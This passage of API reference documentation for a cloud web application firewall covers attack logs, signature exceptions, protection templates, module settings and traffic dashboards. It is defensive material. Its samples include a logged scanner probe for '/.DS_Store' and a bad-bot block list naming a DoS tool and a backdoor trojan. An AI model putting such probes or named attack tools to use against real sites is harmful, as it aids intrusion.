- "msg_id": "000002053412",
- "http_url": "/index.php",
- "platform": "cloud",
- "more_actions": [
- "sig_add_exception",
- "ml_add_exception"
]
}, - {
- "_id": "4ec62c02-2a2d-405c-81be-9a2b03f87475",
- "app_name": "kris-231-qa2-0217",
- "msg": "DDoS Prevention : HTTP Access Limit Violation(Real Browser Enforcement Failed)",
- "srccountry": "Germany",
- "src_ip": "62.171.132.155",
- "threat_level": "Substantial",
- "ep_id": "4056551849",
- "signature_id": "N/A",
- "date_time": "2023-04-21T09:29:45+08:00",
- "action": "Block",
- "msg_id": "000006053452",
- "http_url": "none",
- "platform": "cloud",
- "more_actions": [ ]
}
]
}Returns detail data, especially the packet detail, of a selected attack log.
| storage_region required | string Enum: "cloud_us-east-1" "cloud_eu-central-1" "onpremise_us-east-1" "onpremise_eu-central-1" Example: cloud_us-east-1 region name of attack log are stored in. |
| log_uuid required | string Example: 0f05848f-ccab-43ce-a210-7e7f6d8cde7e log uuid. |
{- "msg_id": "000000232814",
- "msg": "Known Attacks: Known Exploits violation in URL",
- "ep_id": "7542132475",
- "app_name": "kris-multiple-domain-same-root",
- "ep_domain": "krisqa.waasonline.net",
- "platform": "cloud",
- "user_id": "feaf049e-9a68-11eb-a264-0a7a34043d2f",
- "user_name": "1245460@qq.com",
- "main_type": "Known Attacks",
- "sub_type": "Known Exploits",
- "log_id": "20000200",
- "src_ip": "139.144.96.150",
- "srccountry": "Australia",
- "owasp_top10": "A06:2021-Vulnerable and Outdated Components",
- "date_time": "2023-03-07T04:03:46+01:00",
- "action": "Block",
- "threat_weight": "50",
- "signature_cve_id": "N/A",
- "login_user": "Unknown",
- "country_flag": "AU",
- "backend_service": "unknown",
- "signature_id": "090300053",
- "bot_info": { },
- "http_method": "GET",
- "http_host": "krisqaauth.waasonline.net",
- "http_url": "/.DS_Store",
- "http_agent": "Go-http-client/1.1",
- "threat_level": "Substantial",
- "http_refer": "none",
- "http_version": "1.x",
- "packet": {
- "match_info": "1",
- "head": {
- "User-Agent:": "Go-http-client/1.1",
- "Accept-Encoding:": "gzip",
- "Host:": "krisqaauth.waasonline.net",
- "Connection:": "close",
- "GET ": "/.DS_Store HTTP/1.1"
}, - "args": [ ],
- "pattern": "/.DS_Store",
- "files": [ ],
- "cookies": [ ]
}, - "ml_log_sample_arglen_mean": "0.000000",
- "ml_log_hmm_probability": "0.000000",
- "ml_svm_accuracy": "none",
- "ml_svm_log_match_types": null,
- "ml_svm_log_main_types": "0",
- "ml_domain_index": "0",
- "ml_log_arglen": "0",
- "ml_arg_dbid": "0",
- "ml_url_dbid": "0",
- "ml_log_sample_prob_mean": "0.000000",
- "src_port": "43114",
- "service": "https/tls1.3"
}The 'app_name' is only available for Cloud logs, while the 'device_id' (AKA: SN of On-Premise devices) and 'policy_name' are only available for On-Premise logs.
| storage_region required | string Enum: "cloud_us-east-1" "cloud_eu-central-1" "onpremise_us-east-1" "onpremise_eu-central-1" Example: cloud_us-east-1 region name of attack log are stored in. |
| key required | string Example: key=srccountry filter key name. |
| time_range | string Example: time_range=24h range of generated time of attack logs. |
| filter | string Example: filter=%5B%7B%22id%22%3A%22ep_domain%22%2C%22logic%22%3A%7B%22RANGE%22%3A0%2C%20%22NOT%22%3A1%7D%2C%22value%22%3A%5B%22www.test.com%22%5D%7D%5D filter strings. Filter should be with format like: [{"id":"ep_domain","logic":{"RANGE":0, "NOT":1},"value":["www.test.com"]}]. The value must be encoded as URL component. |
[- {
- "United States": "41%"
}, - {
- "Canada": "20%"
}, - {
- "India": "18%"
}, - {
- "Russia": "12%"
}, - {
- "Iran": "6%"
}
]| storage_region required | string Enum: "cloud_us-east-1" "cloud_eu-central-1" "onpremise_us-east-1" "onpremise_eu-central-1" Example: cloud_us-east-1 region name of attack log are stored in |
| log_uuid required | string Example: 0f05848f-ccab-43ce-a210-7e7f6d8cde7e log uuid |
| module_name required | string Example: signature_exception module name |
| signature_id required | string Example: signature_id=090500348 signature_id |
{- "summary": "Get information of signature",
- "value": {
- "template": "template_id",
- "signature_name": "Known Exploits",
- "url": "/auth/oauth/v2/authorize",
- "cookies": [
- "state",
- ".Asp"
], - "params": [
- "client_id",
- "response_type",
- "scope"
]
}
}To add exception of a signature, you need some extra information which could be retrieved by GET method of this API.
You can also add a signature exception to a template, so that the exception could be applied to all applications which are bound to this template.
This API endpoint is available for cloud attack logs only.
| storage_region required | string Enum: "cloud_us-east-1" "cloud_eu-central-1" "onpremise_us-east-1" "onpremise_eu-central-1" Example: cloud_us-east-1 region name of attack log are stored in. |
| log_uuid required | string Example: 0f05848f-ccab-43ce-a210-7e7f6d8cde7e log uuid. |
| module_name required | string Example: one of 'signature_exception', 'ml_arg_exception', 'ml_rebuild_url' configued module name |
{- "exception rule": {
- "url": {
- "operator": "STRING_MATCH",
- "value": "/index.php",
- "status": "enable"
}, - "parameter": {
- "operator": "STRING_MATCH",
- "value": "client-id",
- "status": "enable"
}, - "cookie": {
- "operator": "REGEXP_MATCH",
- "value": "state*",
- "status": "enable"
}, - "signature_id": "090501003",
- "signature_name": "Known Exploits"
}, - "template": "<template_id>"
}{- "detail": "success"
}| forward | string Example: forward=true True: the next page; False: the previous page. |
| filter | string Example: filter=%5B%7B%22id%22%3A%22domain_name%22%2C%22logic%22%3A%7B%7D%2C%22value%22%3A%5B%22waf.domain-999.com%22%5D%7D%5D The filter should like: then URL encode this filter string and put this in filter parameter. The available "id" of filter are |
| cursor | string To list the items of the first page, leave the cursor value empty. To go forward to next page, get the value of the "next_cursor" parameter in the result of the current page, then paste it here as the cursor value. To go to the previous page, get the "prev_cursor" value, then paste it here as the cursor value. |
| size | string Example: size=10 Should be integer and greater than 0 |
{- "prev_cursor": "",
- "next_cursor": "",
- "total": 2,
- "devices": [
- {
- "sn": "FVVM0000000000XX",
- "device_type": "fwb",
- "data_storage": "us-east-1",
- "location": "US East (Ohio)",
- "status": "Online",
- "expiration_date": "2023-03-01",
- "hostname": "US-WAF1",
- "product_model": "FortiWeb VM08",
- "ha_node": 1,
- "master_sn": "FVVM0000000000XX",
- "member_sn": [
- "FVVM0000000000XY"
]
}, - {
- "sn": "FVVM0000000000XZ",
- "device_type": "fwb",
- "data_storage": "us-east-1",
- "location": "US East (Ohio)",
- "status": "Offline",
- "expiration_date": "2023-03-01",
- "hostname": "US-WAF3",
- "product_model": "FortiWeb VM08",
- "ha_node": 0,
- "master_sn": "FVVM0000000000XZ",
- "member_sn": [ ]
}
]
}| sn required | string Example: FVVM0000000000XX The serial number |
| location | string |
{- "locations": "US East (Ohio)"
}{- "detail": "Successfully"
}{- "result": [
- {
- "template_id": "d1f0e0e6-6e8a-5659-aef2-0018d3a13b10",
- "name": "Drupal",
- "features": [
- "botdetection",
- "RequestLimits",
- "ddosprevention",
- "FileProtection",
- "knownattacks",
- "IPProtection",
- "customrule"
], - "predefine": true,
- "endpoints": [
- [
- "1234567890",
- "APP-TEST",
- "app.test.com"
]
]
}, - {
- "template_id": "bc4c9369-ba48-5b30-81f7-95483fc089ba",
- "name": "Exchange",
- "features": [
- "botdetection",
- "RequestLimits",
- "ddosprevention",
- "FileProtection",
- "knownattacks",
- "IPProtection",
- "customrule"
], - "predefine": true,
- "endpoints": [ ]
}, - {
- "template_id": "fc5260ec-4853-547d-90ba-d8c4acc9746f",
- "name": "ExtendedProtection",
- "features": [
- "botdetection",
- "biometricsbaseddetection",
- "RequestLimits",
- "ddosprevention",
- "httpheadersecurity",
- "CookieSecurity",
- "FileProtection",
- "knownattacks",
- "IPProtection",
- "customrule",
- "informationleakage"
], - "predefine": true,
- "endpoints": [ ]
}, - {
- "template_id": "2eb3d56f-1ae9-5b4c-80b0-bb7f08f806a2",
- "name": "SharePoint",
- "features": [
- "botdetection",
- "RequestLimits",
- "ddosprevention",
- "FileProtection",
- "knownattacks",
- "IPProtection",
- "customrule"
], - "predefine": true,
- "endpoints": [ ]
}, - {
- "template_id": "030c3362-b126-5a07-bf59-83c34d7ea0cc",
- "name": "StandardProtection",
- "features": [
- "botdetection",
- "RequestLimits",
- "ddosprevention",
- "FileProtection",
- "knownattacks",
- "IPProtection",
- "customrule"
], - "predefine": true,
- "endpoints": [ ]
}, - {
- "template_id": "4f37d570-a2c0-57a8-9dd1-443292f7f88e",
- "name": "Wordpress",
- "features": [
- "botdetection",
- "RequestLimits",
- "ddosprevention",
- "FileProtection",
- "knownattacks",
- "IPProtection",
- "customrule"
], - "predefine": true,
- "endpoints": [ ]
}
], - "total": 6,
- "user_perm": "rw"
}Create a new template.
| name | string Template name |
| endpoints | Array of strings Endpoints list |
{- "endpoints": [
- "1234567890"
], - "name": "template-name"
}{- "detail": "Template created"
}Create a new template from the existing one.
| name | string Template name |
| from_template | string Source template ID |
{- "name": "template-clone-name",
- "from_template": "e50cbdc9-e4fa-5aca-963c-f115fb63b7ba"
}{- "detail": "Template cloned"
}Fetch the template detail.
| template_id required | string Template ID |
{- "result": {
- "template_id": "bd45f3d5-7388-5df8-a514-75c354e81b2b",
- "name": "template-name",
- "predefine": false,
- "endpoints": [
- "1234567890"
], - "features": [
- "knownattacks"
]
}
}Update the template.
| template_id required | string Template ID |
| endpoints | Array of strings Endpoint ID |
{- "endpoints": [
- "1234567890"
]
}{- "detail": "Template updated"
}Test whether the web service of a server for the protected domain is available or not.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| domain_name required | string The fully-qualified domain name (FQDN) of the server. |
| backend_type required | string The IP or Domain which indicates how you want to define the server. The valid values are HTTP and HTTPS. |
| backend_ip required | string The IP address of the origin server. |
| backend_port | string The TCP port number where the server listens for connections. The number is an integer, and the valid range is from 1 to 65,535. |
{- "network_connectivity": 1,
- "head_availability": 1,
- "head_status_code": 404
}Get all modules' status of the EndPoint. A sample response body conforms to the following JSON schema:
[
{
"id": "knownattacks",
"status": "disable",
"inherited": "enable"
},
]
Authorization request header. See Request format section for API key secret details.| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
[- {
- "id": "known_attacks",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "anomaly_detection",
- "status": "disable",
- "inherited": "disable"
}, - {
- "id": "information_leakage",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "cookie_security",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "file_protection",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "parameter_validation",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "http_header_security",
- "status": "enable",
- "inherited": "enable"
}, - {
- "id": "csrf_protection",
- "status": "enable",
- "inherited": "enable"
}, - {
- "id": "mitb_protection",
- "status": "enable",
- "inherited": "enable"
}, - {
- "id": "request_limits",
- "status": "enable",
- "inherited": "enable"
}, - {
- "id": "url_access",
- "status": "enable",
- "inherited": "enable"
}, - {
- "id": "ip_protection",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "known_bots",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "threshold_detection",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "ml_bot_detection",
- "status": "enable",
- "inherited": "enable"
}, - {
- "id": "biometrics_based_detection",
- "status": "enable",
- "inherited": "disable"
}, - {
- "id": "bot_deception",
- "status": "enable",
- "inherited": "enable"
}, - {
- "id": "ddos_prevention",
- "status": "enable",
- "inherited": "enable"
}, - {
- "id": "custom_rule",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "web_socket_security",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "api_protection",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "api_gateway",
- "status": "enable",
- "inherited": "enable"
}, - {
- "id": "mobile_api_protection",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "json_protection",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "xml_protection_policy",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "ml_api_protection",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "account_takeover",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "rewriting_requests",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "caching_compression",
- "status": "disable",
- "inherited": "enable"
}, - {
- "id": "global_trust_list_parameter",
- "status": "enable",
- "inherited": "enable"
}, - {
- "id": "cors_protection",
- "status": "enable",
- "inherited": "enable"
}
]Modify Modules configuration of the Endpoints. A sample request body conforms to the following JSON schema:
[
{
"id": "knownattacks",
"status": "disable"
},
]
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| id required | string Enum: "known_attacks" "anomaly_detection" "information_leakage" "cookie_security" "file_protection" "parameter_validation" "http_header_security" "csrf_protection" "mitb_protection" "request_limits" "url_access" "ip_protection" "known_bots" "threshold_detection" "ml_bot_detection" "biometrics_based_detection" "bot_deception" "ddos_prevention" "custom_rule" "web_socket_security" "api_protection" "api_gateway" "mobile_api_protection" "json_protection" "xml_protection_policy" "ml_api_protection" "account_takeover" "rewriting_requests" "caching_compression" "global_trust_list_parameter" "cors_protection" The ID of the module |
| status required | string Enum: "enable" "disable" If the module is enabled or disabled |
| inherited | string Enum: "enable" "disable" If the module uses the configuration which is inherted from the template |
[- {
- "id": "known_attacks",
- "status": "disable"
}, - {
- "id": "anomaly_detection",
- "status": "disable"
}, - {
- "id": "information_leakage",
- "status": "disable"
}, - {
- "id": "cookie_security",
- "status": "disable"
}, - {
- "id": "file_protection",
- "status": "disable"
}, - {
- "id": "parameter_validation",
- "status": "disable"
}, - {
- "id": "http_header_security",
- "status": "enable"
}, - {
- "id": "csrf_protection",
- "status": "enable"
}, - {
- "id": "mitb_protection",
- "status": "enable"
}, - {
- "id": "request_limits",
- "status": "enable"
}, - {
- "id": "url_access",
- "status": "enable"
}, - {
- "id": "ip_protection",
- "status": "disable"
}, - {
- "id": "known_bots",
- "status": "disable"
}, - {
- "id": "threshold_detection",
- "status": "disable"
}, - {
- "id": "ml_bot_detection",
- "status": "enable"
}, - {
- "id": "biometrics_based_detection",
- "status": "enable"
}, - {
- "id": "bot_deception",
- "status": "enable"
}, - {
- "id": "ddos_prevention",
- "status": "enable"
}, - {
- "id": "custom_rule",
- "status": "disable"
}, - {
- "id": "web_socket_security",
- "status": "disable"
}, - {
- "id": "api_protection",
- "status": "disable"
}, - {
- "id": "api_gateway",
- "status": "enable"
}, - {
- "id": "mobile_api_protection",
- "status": "disable"
}, - {
- "id": "json_protection",
- "status": "disable"
}, - {
- "id": "xml_protection_policy",
- "status": "disable"
}, - {
- "id": "ml_api_protection",
- "status": "disable"
}, - {
- "id": "account_takeover",
- "status": "disable"
}, - {
- "id": "rewriting_requests",
- "status": "disable"
}, - {
- "id": "caching_compression",
- "status": "disable"
}, - {
- "id": "global_trust_list_parameter",
- "status": "enable"
}, - {
- "id": "cors_protection",
- "status": "enable"
}
]{- "detail": "Module configuration changed successfully."
}Check DNS lookup utility. FortiWeb Cloud parses the protected domain name specified to obtain the IP and CNAME if any.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| domain | string |
{- "domain": "www.kernel.org"
}{- "A": [
- "145.40.73.55"
], - "CNAME": [
- "geo.source.kernel.org"
]
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| filter | string The filter should like: [{"id":"domain_name", "logic":{}, "value":["www1.demo.com"]}], then URL encode this filter string and put this in filter parameter. The available "id" of filter are ["app_name", "domain_name", "platform", "ep_id"]. |
{- "result": {
- "app_num": 10,
- "platform": 3,
- "region": 6,
- "management_ip": {
- "ip4": [
- "134.237.192.10",
- "13.65.16.38"
]
}, - "waf_ip": {
- "ap-southeast-1": {
- "ip4": [
- "18.136.127.109",
- "54.169.189.127"
], - "ip6": [
- "2406:da18:19b:801:2a45:8fba:45bd:f9b0",
- "2406:da18:19b:802:e312:dd39:6167:df38"
]
}, - "eastus": {
- "ip4": [
- "18.136.127.209",
- "54.169.189.227"
], - "ip6": [
- "3406:da18:19b:801:2a45:8fba:45bd:f9b0",
- "3406:da18:19b:802:e312:dd39:6167:df38"
]
}
}
}
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| forward | string True: the next page. False: the previous page. |
| filter | string The filter should like: [{"id":"domain_name", "logic":{}, "value":["www1.demo.com"]}], then URL encode this filter string and put this in filter parameter. The available "id" of filter are ["app_name", "domain_name", "block_mode", "platform", "owner", "data", "blocked_req", "req", "assign_to", "template_name"]. |
| cursor | string To list the items of the first page, leave the cursor value empty. To go forward to next page, get the value of the 'next_cursor' parameter in the result of the current page, then paste it here as the cursor value. To go to the previous page, get the 'prev_cursor' value, then paste it here as the cursor value. |
| size | string An integer, the page size. The value shall be 10, 20, 30. |
| partial | string Basic marker. |
| custom_ports | string The vaules for the {{custom_ports}} are ['http', 'https', 'all'] |
{- "app_list": [
- {
- "user_id": "a2dfa0ba-cedb-11e9-92f2-0686a6b189d0",
- "ep_id": "9746244757",
- "app_name": "app-test1",
- "domain_name": "www1.demo.com",
- "extra_domains": [ ],
- "ep_cname": "www1.demo.20867.waasonline.net",
- "region": "CDN",
- "platform_region": "us-east-1",
- "platform": "AWS",
- "block_mode": 1,
- "cdn_status": 0,
- "template_id": "",
- "tenant_id": "1ecb0a8e-1d56-11ea-a599-0a9068c47440",
- "can_update": true,
- "can_delete": true,
- "dns_status": 0,
- "domain_status": {
- "www1.demo.com": 0
}, - "naked_domain_ips": [
- "3.91.211.14",
- "44.199.160.6"
], - "waf_addresses": {
- "us-east-1": [
- {
- "ip": "54.144.250.206"
}, - {
- "ip": "23.21.42.132"
}, - {
- "ip": "3.226.15.207"
}, - {
- "ip": "3.93.159.67"
}, - {
- "ip": "54.243.58.76"
}
]
}, - "template_name": "",
- "req": 5938,
- "blocked_req": 136,
- "data": 3085612,
- "assign_to": "test@example.com",
- "assign_to_user_name": "test@example.com",
- "acme_info": [ ]
}
], - "total": 1,
- "prev_cursor": "",
- "next_cursor": "",
- "can_add": 1
}Create a new application.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| app_name | string The application name |
{- "app_name": "wl_us1",
- "domain_name": "www.example.com",
- "extra_domains": [
- "a.example.com",
- "b.example.com"
], - "custom_port": {
- "http": 80,
- "https": 443
}, - "cdn_status": 0,
- "region": "us-east-1",
- "platform": "AWS",
- "block_mode": 0,
- "service": [
- "http",
- "https"
], - "server_address": "93.184.216.34",
- "server_type": "https",
- "server_country": "United States",
- "head_availability": 1,
- "head_status_code": 404,
- "is_global_cdn": 1,
- "continent": "NA"
}{- "detail": "Invalid HTTP method"
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| dns_resolve | boolean |
{- "app_name": "wl_us1",
- "domain_name": "www.example.com",
- "block_mode": 0,
- "fsa_status": 1
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| dns_resolve | boolean |
{- "app_name": "test",
- "user_name": "foo",
- "assign_to_user_name": "bar",
- "assign_to": "baz",
- "cdn_status": 0,
- "region": "us-east-1",
- "is_global_cdn": 0,
- "continent": "NA"
}{- "detail": "Get application status failed"
}Delete an application.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "detail": "Get application status failed"
}Enable/Disable the block mode.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| block_mode | integer Enum: 0 1 Select 0 to disable the block mode, or select 1 to enable the block mode |
{- "block_mode": 1
}{- "detail": "Get application status failed"
}List all owners whom you can create applications for.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
{- "assign_to": [ ],
- "owners": [
- {
- "email_address": "test@gmail.com",
- "is_self": true,
- "total": "10",
- "used": 1,
- "user_id": "fcw_test@gmail.com",
- "user_name": "Test"
}
]
}Fetch the region of AWS service, geo-location and supported cluster region based on the given web server IP address.
{
"type": "object",
"required": ["ep_ip","domain_name"],
"properties": {
"ep_ip": {
"description": "Endpoint IPv4 address",
"type": "string",
},
"domain_name": {
"description": "Domain name",
"type": "string",
},
"extra_domains": {
"description": "Extra domains list",
"type": "array"
}
}
}
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| extra_domains | Array of strings The extra domain of the site |
| domain_name | string The domain of the site |
| ep_ip | string Ip of the site |
{- "ep_ip": "35.172.155.99",
- "domain_name": "www.example.com",
- "extra_domains": [
- "web1.example.com",
- "web2.example.com"
]
}{- "region": [ ],
- "location": "United States",
- "cluster": {
- "single": "us-east-1",
- "all": [
- "ca-central-1",
- "us-east-1",
- "eu-west-2",
- "us-west-1",
- "sa-east-1",
- "ap-south-1",
- "us-east-2",
- "ap-southeast-1.prod",
- "us-west-2",
- "eu-west-1",
- "eu-central-1",
- "eu-south-1",
- "eu-west-3",
- "ap-southeast-2"
], - "platform": "Amazon Web Service",
- "plat": "AWS",
- "continent": "NA",
- "continent_regions": [
- "us-east-1",
- "us-east-2",
- "us-west-1",
- "us-west-2",
- "ca-central-1",
- "sa-east-1"
]
}
}Get the known bad bot list by category name.
Requires API key secret as Authorization request header. See Authentication section for API key secret details.
| category required | string Category of bad bot. Should be one of the categories in DoS Spam Trojan Scanner Crawler |
| bots-type required | string |
{- "detail": "successfully",
- "result": {
- "category": "DoS",
- "bot-list": [
- "Siege",
- "Cyberdog",
- "Backdoor.Win32.Vertexbot.A",
- "D3DL0 G00D N1C3"
]
}
}| ep_id required | string |
| count | string Return the first N countries data |
| timespan required | string Time range to show the statistic. This parameter is required. No default value. Value could be one of ['last_4_hours', 'last_24_hours', 'last_7_days', 'last_14_days', 'last_30_days']. |
{- "United States": {
- "average_http_request_bytes": 1892633789,
- "average_http_response_bytes": 3661572138,
- "total_bytes": 5554205927
}, - "Australia": {
- "average_http_request_bytes": 141763441,
- "average_http_response_bytes": 314340558,
- "total_bytes": 456103999
}, - "India": {
- "average_http_request_bytes": 136768962,
- "average_http_response_bytes": 268361880,
- "total_bytes": 405130842
}, - "Canada": {
- "average_http_request_bytes": 96618454,
- "average_http_response_bytes": 185978294,
- "total_bytes": 282596748
}, - "United Kingdom": {
- "average_http_request_bytes": 47802081,
- "average_http_response_bytes": 94220944,
- "total_bytes": 142023025
}, - "France": {
- "average_http_request_bytes": 46867923,
- "average_http_response_bytes": 90788160,
- "total_bytes": 137656083
}, - "Germany": {
- "average_http_request_bytes": 40301141,
- "average_http_response_bytes": 100380142,
- "total_bytes": 140681283
}, - "China": {
- "average_http_request_bytes": 43631326,
- "average_http_response_bytes": 90603968,
- "total_bytes": 134235294
}, - "Japan": {
- "average_http_request_bytes": 33241889,
- "average_http_response_bytes": 64323196,
- "total_bytes": 97565085
}, - "Singapore": {
- "average_http_request_bytes": 32296236,
- "average_http_response_bytes": 62012382,
- "total_bytes": 94308618
}
}Get the information of threat level history on DASHBOARD tab.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string The application ID, it can be obtained from List Applications API. |
| timespan required | string Enum: "last_24_hours" "last_7_days" "last_14_days" "last_30_days" |
| offset_hours | string The value should be integer of -11~12, and the default value is 0. This value is required only when {{timespan}} equals to "last_7_days", "last_14_days", "last_30_days". |
{- "20190610T040000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T050000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T060000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T070000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T080000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T090000": {
- "curr_rank": 0,
- "avg_score": 185,
- "curr_score": 0
}, - "20190610T100000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T110000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T120000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T130000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T140000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T150000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T160000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T170000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T180000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T190000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T200000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T210000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T220000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190610T230000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190611T000000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190611T010000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}, - "20190611T020000": {
- "curr_rank": 0,
- "avg_score": 1000,
- "curr_score": 0
}, - "20190611T030000": {
- "curr_rank": 0,
- "avg_score": 270,
- "curr_score": 0
}, - "20190611T040000": {
- "curr_rank": 0,
- "avg_score": 0,
- "curr_score": 0
}
}Get the information of threat level values on Application DASHBOARD tab.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string The application ID, it can be obtained from List Applications API. |
{- "level": 0,
- "categories": { }
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string |
| category required | string The values for this variable are ["month_sum", "lic_info", "req", "tp"].It is required parameter and has no default value.
|
| timespan required | string This parameter is required if category equals to 'tp' or 'req'. Value could be one of ['last_hour', 'last_24_hours', 'last_7_days', 'last_14_days']. No default value. |
| local_timezone | string Specify your local timezone with minutes format, like -480 (-08:00) or 120(+02:00). |
{- "20190606T160000": {
- "http_tp": 0,
- "https_tp": 0
}, - "20190606T170000": {
- "http_tp": 0,
- "https_tp": 0
}, - "20190606T180000": {
- "http_tp": 0,
- "https_tp": 0
}
}Get the information of server status on DASHBOARD tab.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string The application ID, it can be obtained from List Applications API. |
{- "health_check": true,
- "servers": [
- {
- "status": "active",
- "addr": "116.211.184.212"
}
], - "counter": {
- "active": 1,
- "out_of_service": 0,
- "disabled": 0
}
}Get OWASP TOP 10 data for Application Dashboard.
| ep_id required | string The application ID, it can be obtained from List Applications API. |
| timespan required | string Available values include: last_hour, last_24_hours and last_7_days |
[- {
- "key": "A9:2017-Using Components with Known Vulnerabilities",
- "doc_count": 7513,
- "percentage": "42.0"
}, - {
- "key": "A1:2017-Injection",
- "doc_count": 7092,
- "percentage": "39.7"
}, - {
- "key": "A7:2017-Cross-Site Scripting (XSS)",
- "doc_count": 2095,
- "percentage": "11.7"
}, - {
- "key": "A6:2017-Security Misconfiguration",
- "doc_count": 478,
- "percentage": "2.7"
}, - {
- "key": "A3:2017-Sensitive Data Exposure",
- "doc_count": 397,
- "percentage": "2.2"
}, - {
- "key": "A5:2017-Broken Access Control",
- "doc_count": 200,
- "percentage": "1.1"
}, - {
- "key": "A2:2017-SQL Injection",
- "doc_count": 100,
- "percentage": "0.6"
}
]| ep_id required | string |
| start_time | string the start time of timespan |
| end_time | string the end time of timespan |
| type | string the type of query result only support "summary" and for "detail" |
| size | string the result table size |
| page | string the page number of requested information |
| filter | string For example, for the Agent details table, the filter is{"http_method":"get"} |
{- "details": {
- "get": {
- "count": 52
}
}, - "summary": {
- "start": "1660254877990",
- "end": "1660341277990",
- "count": 145,
- "graph": [
- {
- "id": 1,
- "time": 1660254600000,
- "data": [ ]
}, - {
- "id": 2,
- "time": 1660255200000,
- "data": [ ]
}, - {
- "id": 3,
- "time": 1660255800000,
- "data": [ ]
}, - {
- "id": 4,
- "time": 1660256400000,
- "data": [ ]
}, - {
- "id": 5,
- "time": 1660257000000,
- "data": [ ]
}, - {
- "id": 6,
- "time": 1660257600000,
- "data": [ ]
}, - {
- "id": 7,
- "time": 1660258200000,
- "data": [ ]
}, - {
- "id": 8,
- "time": 1660258800000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 2
}
}
]
}, - {
- "id": 9,
- "time": 1660259400000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 4
}
}
]
}, - {
- "id": 10,
- "time": 1660260000000,
- "data": [ ]
}, - {
- "id": 11,
- "time": 1660260600000,
- "data": [ ]
}, - {
- "id": 12,
- "time": 1660261200000,
- "data": [ ]
}, - {
- "id": 13,
- "time": 1660261800000,
- "data": [ ]
}, - {
- "id": 14,
- "time": 1660262400000,
- "data": [ ]
}, - {
- "id": 15,
- "time": 1660263000000,
- "data": [ ]
}, - {
- "id": 16,
- "time": 1660263600000,
- "data": [ ]
}, - {
- "id": 17,
- "time": 1660264200000,
- "data": [ ]
}, - {
- "id": 18,
- "time": 1660264800000,
- "data": [ ]
}, - {
- "id": 19,
- "time": 1660265400000,
- "data": [ ]
}, - {
- "id": 20,
- "time": 1660266000000,
- "data": [ ]
}, - {
- "id": 21,
- "time": 1660266600000,
- "data": [ ]
}, - {
- "id": 22,
- "time": 1660267200000,
- "data": [ ]
}, - {
- "id": 23,
- "time": 1660267800000,
- "data": [ ]
}, - {
- "id": 24,
- "time": 1660268400000,
- "data": [ ]
}, - {
- "id": 25,
- "time": 1660269000000,
- "data": [ ]
}, - {
- "id": 26,
- "time": 1660269600000,
